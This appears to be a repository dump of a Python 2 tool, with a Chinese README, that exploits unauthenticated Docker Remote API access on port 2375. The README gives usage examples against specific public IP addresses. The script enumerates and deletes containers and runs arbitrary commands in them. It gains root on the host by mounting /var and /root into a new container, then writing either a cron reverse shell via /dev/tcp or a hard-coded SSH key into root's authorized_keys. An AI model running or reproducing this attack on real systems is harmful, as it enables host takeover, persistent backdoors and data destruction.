[ { "path": "README.md", "content": "# docker_api_vul\ndocker 未授权访问漏洞利用脚本\n\n##安装类库\n\n pip install -r requirements.txt\n\n##查看运行的容器\n\n python dockerRemoteApiGetRootShell.py -h 139.217.25.172 -p 2375\n\n##查看所有的容器\n\n python dockerRemoteApiGetRootShell.py -h 139.217.25.172 -p 2375 -a\n\n##查看所有镜像\n\n python dockerRemoteApiGetRootShell.py -h 139.217.25.172 -p 2375 -l\n\n##查看端口映射\n\n python dockerRemoteApiGetRootShell.py -h 139.217.25.172 -p 2375 -L\n\n##写计划任务(centos,redhat等,加-u参数用于ubuntu等)\n\n python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -C -i 镜像名 -H 反弹ip -P 反弹端口\n python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -C -u -i 镜像名 -H 反弹ip -P 反弹端口\n\n##写sshkey(自行修改脚本的中公钥)\n\n python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -C -i 镜像名 -k\n\n##在容器中执行命令\n\n python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -e \"id\" -I 容器id\n\n##删除容器\n\n python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -c -I 容器id\n\n##修改client api版本\n\n python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -v 1.22\n\n##查看服务端api版本\n\n python dockerRemoteApiGetRootShell.py -h 158.85.173.113 -p 2375 -V\n\n" }, { "path": "dockerRemoteApiGetRootShell.py", "content": "#-*- coding:utf-8 -*-\n#author:L.N.@insight-labs.org\n\n\nimport urllib2\nimport urllib\nimport json\nimport sys\nimport getopt\nfrom docker import Client\n\ndef http_get(url):\n response = urllib2.urlopen(url)\n return response.read()\n\ndef http_post(url, values):\n jdata = values\n #print url\n #print jdata\n send_headers = {\n 'Content-Type':'application/json'\n }\n req = urllib2.Request(url, data=jdata,headers=send_headers)\n response = urllib2.urlopen(req)\n return response.read()\n\ndef isset(v):\n try :\n type(eval(v))\n except:\n return 0\n else:\n return 1\n\ndef printport(portsList, name):\n if isset(\"portsList['IP']\") == 0:\n portsList['IP']=\"*\"\n printport(portsList,name)\n elif isset(\"portsList['Type']\") == 0:\n portsList['Type']=\"*\"\n printport(portsList,name)\n elif isset(\"portsList['PublicPort']\") == 0:\n portsList['PublicPort']=\"*\"\n printport(portsList,name)\n elif isset(\"portsList['PrivatePort']\") == 0:\n portsList['PrivatePort']=\"*\"\n printport(portsList,name)\n else:\n print \"[-]\"+name+\"[+]\"+portsList['Type']+\"[-]\"+portsList['IP']+\":\"+str(portsList['PrivatePort'])+\" --> \"+host+\":\"+str(portsList['PublicPort'])\n\ndef createClient(host,port,version):\n clientApiVersion = getversion(host,port,version)\n print \"[-]ClientApiVersion:\"+clientApiVersion\n cli = Client(base_url='tcp://'+host+':'+port,version=clientApiVersion)\n return cli\n\ndef getversion(host,port,version):\n url = \"http://\"+host+\":\"+port+\"/version\"\n ret = json.loads(http_get(url))\n if version != '':\n clientApiVersion = version\n else:\n clientApiVersion = ret['ApiVersion']\n return clientApiVersion\n\ndef printContainer(host,port,version,allContainer):\n cli = createClient(host,port,version)\n if allContainer == 1:\n ret = cli.containers(all=True)\n else:\n ret = cli.containers()\n for info in ret:\n print \"[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]\"\n print \"[-] id: \"+info['Id']\n print \"[-] Names: \"+info['Names'][0]\n print \"[-] Image: \"+info['Image']\n print \"[-] Status: \"+info['Status']\n print \"[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]\"\n\nif __name__ == \"__main__\":\n opts, args = getopt.getopt(sys.argv[1:], \"v:kauVCcsLli:e:h:p:H:P:I:\")\n key = 0\n version =''\n payload =''\n sshkey = 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCoecC7vmWn4s2y4T+Pc3bJ0owDYWzGIBTCWWonN4qMTCbe66hKopgtUuHC1y5H3HFQ0qsni0vFAGSoO4TLiIpvHUXbf9Wi9vR2q4oYphH9Kgsd3cVXsHUFcgybwdk5DCXpmoSJTlEoOrtWajYdyuALMy+CqpkwWDj+uTz+9/2P3T0Nh5F+U+UZOgSqIi5xQfUGJKGoFGXwvpqEL6UnGG4bbgGxVa5mJZVH0cxwKK6w7luezkcRVBEJ1SZAkjZOmZojyJbYQolItcBNBsXQ+cakjg3DeU69wrDiBdP+k2i2k3uzhJqJXfxLdxUZfjgXHwSOzDb2D5+841trASAwZAy1Gq4uwkbmwupe/qTPK2R31d5h4Jqx4N19eUjT8GkkDj+mnJTwYyOPJH/ghEvn4UfNOtohM2lZPbskvvskn82g0WzYJ5JnQaKfup1IYLTraBbJ5UdVYsCfG5ddRZF4xMab2ZDgcdqyISJxHPK9/P7w7mmgSut1nK5R1+HLSl/xDAPcoVd0H3ePqxN9ZD0BoMjY8fPxKAQR+bB5M05iDIIwUxhj2NQvCpwxxGwJXUSf13zirXRZhkZGnWrkNrzqHzpLZqoEBCEORErmFAvsI8yIBvThSylReiwhAWkdL7ONQ4dd7UgsQfY/0MMfxd8/V+041I1sIVUVBnHYUUwqE0eZ9Q== wanniba@wanniba.com'\n for op, value in opts:\n if op ==\"-l\":\n imagesList = 1\n elif op == \"-i\":\n imageName = value\n elif op == \"-e\":\n dataExec = value\n elif op == \"-h\":\n host = value\n elif op =='-p':\n port = value\n elif op == '-L':\n portList = 1\n elif op == '-H':\n lhsot = value\n elif op == '-P':\n lport = value\n elif op =='-C':\n createContainer = 1\n elif op == '-v':\n version = value\n elif op == '-V':\n version = 1\n elif op == '-c':\n closeContainer = 1\n elif op == '-I':\n imageId = value\n elif op == '-a':\n allContainer = 1\n elif op == '-s':\n startContainer = 1\n elif op == '-k':\n key = 1\n elif op == '-u':\n isUbuntu = 1\n \n if isset('lhsot') and isset('lport'):\n if isset('isUbuntu'):\n payload = '/bin/bash -c \"echo \\\\\\\"*/1 * * * * /bin/bash -i >& /dev/tcp/'+lhsot+'/'+lport+' 0>&1\\\\\\\" >> /tmp/spool/cron/crontabs/root\"' #chmod 600\n else:\n payload = '/bin/bash -c \"echo \\\\\\\"*/1 * * * * /bin/bash -i >& /dev/tcp/'+lhsot+'/'+lport+' 0>&1\\\\\\\" >> /tmp/spool/cron/root\"' #centos,redhat and so on\n print \"[-]Paylaod: \"+payload\n if sshkey !='' and key == 1:\n payload = '/bin/bash -c \"echo \\\\\\\"'+sshkey+'\\\\\\\" >> /tmp1/.ssh/authorized_keys\"'\n print \"[-]Paylaod: \"+payload\n if isset('host') and isset('port'):\n if isset('version') and version == 1:\n url = \"http://\"+host+\":\"+port+\"/version\"\n ret = json.loads(http_get(url))\n print \"[-] ApiVersion: \"+ret['ApiVersion']\n elif isset('imagesList'):\n url = \"http://\"+host+\":\"+port+\"/images/json\"\n ret = json.loads(http_get(url))\n for info in ret:\n print \"RepoTags: \"+info['RepoTags'][0]\n elif isset('createContainer') and isset('imageName'):\n cli = createClient(host,port,version)\n container = cli.create_container(image=imageName, command='/bin/bash', tty=True, volumes=['/tmp','/tmp1'], host_config=cli.create_host_config(binds=['/var:/tmp:rw','/root:/tmp1:rw']))\n print \"[-]Container ID:\"+container['Id']\n print \"[-]Warning:\"+str(container['Warnings'])\n response = cli.start(container=container.get('Id'))\n if isset('isUbuntu'):\n cli.exec_start(exec_id=cli.exec_create(container=container.get('Id'), cmd=payload))\n print \"[-]create crontabs ......\"\n cli.exec_start(exec_id=cli.exec_create(container=container.get('Id'), cmd='chmod 600 /tmp/spool/cron/crontabs/root'))\n print \"[-]chmod 600 ......\"\n else:\n print cli.exec_start(exec_id=cli.exec_create(container=container.get('Id'), cmd=payload))\n print \"[-]create crontabs ......\"\n elif isset('closeContainer') and isset('imageId'):\n cli = createClient(host,port,version)\n cli.stop(container=imageId)\n cli.remove_container(container=imageId)\n elif isset('startContainer') and isset('imageId'):\n cli = createClient(host,port,version)\n cli.start(container=imageId)\n elif isset('dataExec') and isset('imageId'):\n cli = createClient(host,port,version)\n print \"[-]Command:\"+dataExec\n print cli.exec_start(exec_id=cli.exec_create(container=imageId, cmd=dataExec))\n elif isset('portList'):\n url = \"http://\"+host+\":\"+port+\"/containers/json\"\n ret = json.loads(http_get(url))\n for pl in ret:\n if isset(\"pl['Names'][0]\"):\n name = pl['Names'][0]\n else:\n name = '*'\n for portsList in pl['Ports']:\n printport(portsList, name)\n else:\n if isset('allContainer'):\n printContainer(host,port,version,allContainer)\n else:\n printContainer(host,port,version,0)\n" }, { "path": "requirements.txt", "content": "docker-py == 1.8.1\n" } ]